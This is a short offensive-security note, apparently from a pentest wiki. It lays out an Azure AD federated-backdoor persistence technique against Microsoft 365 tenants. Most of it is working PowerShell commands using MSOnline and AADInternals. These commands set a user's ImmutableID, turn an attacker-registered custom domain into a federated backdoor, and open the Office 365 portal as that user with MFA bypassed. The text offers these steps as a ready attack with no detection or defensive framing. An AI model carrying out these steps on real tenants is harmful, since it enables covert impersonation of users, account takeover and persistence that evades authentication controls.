AAD Federated Backdoor

The gist of this persistence technique is creating a malicious domain inside a target tenant and use the newly-created domain to impersonate any user from the tenant in M365. This method requires a high-privilege account to be compromised (or gained) such as Domain Name Admin, Hybrid Identity Admin or, of course, Global Administrator but it allows to bypass any MFA requirements or password-based login mechanisms.

The first step of the attack is getting the IID (Immutable ID) of a user we want to impersonate

PS /home/otter> Connect-MsolService
PS /home/otter> $online = Get-MsolUser -All | Select-Object UserPrincipalName, Immutableid
PS /home/otter> $online

from this output we might see that not all users have an IID set, so we can set one ourselves if needed

PS /home/otter> Set-MsolUser -ImmutableId ottersec -UserPrincipalName "secureuser@minions.onmicrosoft.com"
PS /home/otter> $online = Get-MsolUser -All | Select-Object UserPrincipalName, Immutableid
PS /home/otter> $online

Now we need a domain to use for the attack: we can register one ourselves or use a previously compromised domain; then we can register our domain as a Custom Domain Name inside of the target tenant and use AADInternals to set a backdoor.

PS /home/otter> $at = Get-AADIntAccessTokenForAADGraph
PS /home/otter> Set-AADIntUser -UserPrincipalName "secureuser@minions.onmicrosoft.com" -ImmutableId "ottersec" -AccessToken $at
PS /home/otter> ConvertTo-AADIntBackdoor -AccessToken $at -DomainName "otter.malicious.com"^C

The last command will set the backdoor and return a IssuerUri field which we can use to log in and impersonate secureuser.

PS /home/otter> Open-AADIntOffice365Portal -ImmutableId "ottersec" -Issuer "<issuer_uri>" -BypassMFA $true -UseBuiltInCertificate